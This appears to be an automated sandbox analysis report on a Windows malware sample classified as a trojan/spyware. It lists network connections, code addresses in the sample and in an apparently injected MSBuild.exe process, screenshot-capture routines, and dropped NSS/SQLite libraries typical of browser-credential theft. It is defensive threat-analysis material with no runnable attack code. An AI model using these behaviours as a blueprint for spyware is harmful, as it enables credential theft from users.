Source: unknown Network traffic detected: HTTP traffic on port 57113 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57228 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57216 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57272 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57251 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57068 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57156 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57019 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57091 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57240 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57191 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57057 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57030 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57101 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57217 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57262 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57092 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57157 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57134 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57123 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57239 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57284 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57179 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57041 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57112 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57258 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57235 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57178 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57155 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57069 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57212 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57132 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57058 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57190 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57224 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57081 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57029 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57121 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57070 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57269 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57282 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57223 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57166 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57082 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57189 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57028 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57271 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57108 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57040 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57201 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57119 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57144 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57257 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57200
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57201
Source: unknown Network traffic detected: HTTP traffic on port 57093 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57202
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:57016 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.93.202:443 -> 192.168.2.4:57019 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:57021 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:57213 version: TLS 1.2
Contains functionality to record screenshots
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 1_2_00411F55
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040145B GetCurrentProcess,NtQueryInformationProcess, 1_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CACED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 1_2_6CACED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB0B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 1_2_6CB0B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB0B8C0 rand_s,NtQueryVirtualMemory, 1_2_6CB0B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB0B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 1_2_6CB0B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAAF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 1_2_6CAAF280
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B20AD 0_2_005B20AD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006051BB 0_2_006051BB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F936F 0_2_005F936F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F445D 0_2_005F445D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F14F5 0_2_005F14F5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00605559 0_2_00605559
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005C6615 0_2_005C6615
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F36FD 0_2_005F36FD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0060592B 0_2_0060592B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00604D26 0_2_00604D26
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00605D13 0_2_00605D13
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B1E05 0_2_005B1E05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041C585 1_2_0041C585
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041B825 1_2_0041B825
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0042DA53 1_2_0042DA53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0042D2E3 1_2_0042D2E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0042CE4E 1_2_0042CE4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041961D 1_2_0041961D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0042DE3B 1_2_0042DE3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0042D681 1_2_0042D681
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAA35A0 1_2_6CAA35A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB034A0 1_2_6CB034A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB0C4A0 1_2_6CB0C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAB6C80 1_2_6CAB6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAAD4E0 1_2_6CAAD4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAE6CF0 1_2_6CAE6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAB64C0 1_2_6CAB64C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CACD4D0 1_2_6CACD4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB1542B 1_2_6CB1542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB1AC00 1_2_6CB1AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAE5C10 1_2_6CAE5C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAF2C10 1_2_6CAF2C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAB5440 1_2_6CAB5440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB1545C 1_2_6CB1545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB085F0 1_2_6CB085F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAE0DD0 1_2_6CAE0DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CABFD00 1_2_6CABFD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CACED10 1_2_6CACED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAD0512 1_2_6CAD0512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB04EA0 1_2_6CB04EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB0E680 1_2_6CB0E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAC5E90 1_2_6CAC5E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB176E3 1_2_6CB176E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAABEF0 1_2_6CAABEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CABFEF0 1_2_6CABFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB09E30 1_2_6CB09E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAF5600 1_2_6CAF5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAE7E10 1_2_6CAE7E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB16E63 1_2_6CB16E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAAC670 1_2_6CAAC670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAF2E4E 1_2_6CAF2E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAC4640 1_2_6CAC4640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAC9E50 1_2_6CAC9E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAE3E50 1_2_6CAE3E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAF77A0 1_2_6CAF77A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAADFE0 1_2_6CAADFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAD6FF0 1_2_6CAD6FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAB9F00 1_2_6CAB9F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAE7710 1_2_6CAE7710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAD60A0 1_2_6CAD60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CACC0E0 1_2_6CACC0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAE58E0 1_2_6CAE58E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB150C7 1_2_6CB150C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAEB820 1_2_6CAEB820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAF4820 1_2_6CAF4820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAB7810 1_2_6CAB7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAEF070 1_2_6CAEF070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAC8850 1_2_6CAC8850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CACD850 1_2_6CACD850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAAC9A0 1_2_6CAAC9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CADD9B0 1_2_6CADD9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB02990 1_2_6CB02990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAE5190 1_2_6CAE5190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB1B170 1_2_6CB1B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CABD960 1_2_6CABD960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAFB970 1_2_6CAFB970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CACA940 1_2_6CACA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB12AB0 1_2_6CB12AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAA22A0 1_2_6CAA22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAD4AA0 1_2_6CAD4AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CABCAB0 1_2_6CABCAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB1BA90 1_2_6CB1BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAC1AF0 1_2_6CAC1AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAEE2F0 1_2_6CAEE2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAE8AC0 1_2_6CAE8AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAE9A60 1_2_6CAE9A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAAF380 1_2_6CAAF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB153C8 1_2_6CB153C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAED320 1_2_6CAED320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CABC370 1_2_6CABC370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAA5340 1_2_6CAA5340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBAECD0 1_2_6CBAECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB4ECC0 1_2_6CB4ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC16C00 1_2_6CC16C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB5AC60 1_2_6CB5AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC2AC30 1_2_6CC2AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB54DB0 1_2_6CB54DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCDCDC0 1_2_6CCDCDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBE6D90 1_2_6CBE6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC7AD50 1_2_6CC7AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC1ED70 1_2_6CC1ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCD8D20 1_2_6CCD8D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBD6E90 1_2_6CBD6E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB5AEC0 1_2_6CB5AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBF0EC0 1_2_6CBF0EC0
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_003020AD 8_2_003020AD
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_0034A078 8_2_0034A078
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_003340E8 8_2_003340E8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_003600E8 8_2_003600E8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_0036C118 8_2_0036C118
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_00358468 8_2_00358468
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_0035E4B8 8_2_0035E4B8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_00332558 8_2_00332558
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_00316615 8_2_00316615
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_0035E6F8 8_2_0035E6F8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_00366B38 8_2_00366B38
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_00334DE8 8_2_00334DE8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_0032EEF8 8_2_0032EEF8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_00333148 8_2_00333148
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_0036B1B8 8_2_0036B1B8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_003291CA 8_2_003291CA
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_00329265 8_2_00329265
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_0032925D 8_2_0032925D
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_0032D248 8_2_0032D248
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_0032F2A8 8_2_0032F2A8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_0032D2E2 8_2_0032D2E2
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_00329392 8_2_00329392
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_00329461 8_2_00329461
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_003335D8 8_2_003335D8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_0032B658 8_2_0032B658
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_00355A23 8_2_00355A23
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_00339A28 8_2_00339A28
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_0036FAB8 8_2_0036FAB8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_0032FCA8 8_2_0032FCA8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_00345CD6 8_2_00345CD6
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_00301E05 8_2_00301E05
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_0036FF78 8_2_0036FF78
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6CADCBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6CAE94D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 004104E7 appears 38 times
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: String function: 00307A10 appears 51 times
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: String function: 00334BC8 appears 97 times
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: String function: 00336AA8 appears 171 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 005B7A10 appears 51 times
One or more processes crash
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6988 -s 304
PE / OLE file has an invalid certificate
Source: file.exe Static PE information: invalid certificate
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: .data ZLIB complexity 0.9919345953525641
Source: GCGHCBKFCF.exe.1.dr Static PE information: Section: .data ZLIB complexity 0.9911276223776224
Source: a43486128347[1].exe.1.dr Static PE information: Section: .data ZLIB complexity 0.9911276223776224
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@14/37@13/5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB07030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 1_2_6CB07030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 1_2_004114A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear, 1_2_00411807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\V9HM2KPN.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Temp\delays.tmp Jump to behavior
Source: C:\ProgramData\GCGHCBKFCF.exe Command line argument: MZx 8_2_003020AD
Source: C:\ProgramData\GCGHCBKFCF.exe Command line argument: MZx 8_2_003020AD
Source: C:\ProgramData\GCGHCBKFCF.exe Command line argument: MZx 8_2_003020AD
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2510854270.000000006CCDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2510854270.000000006CCDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2510854270.000000006CCDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2510854270.000000006CCDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sql[1].dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
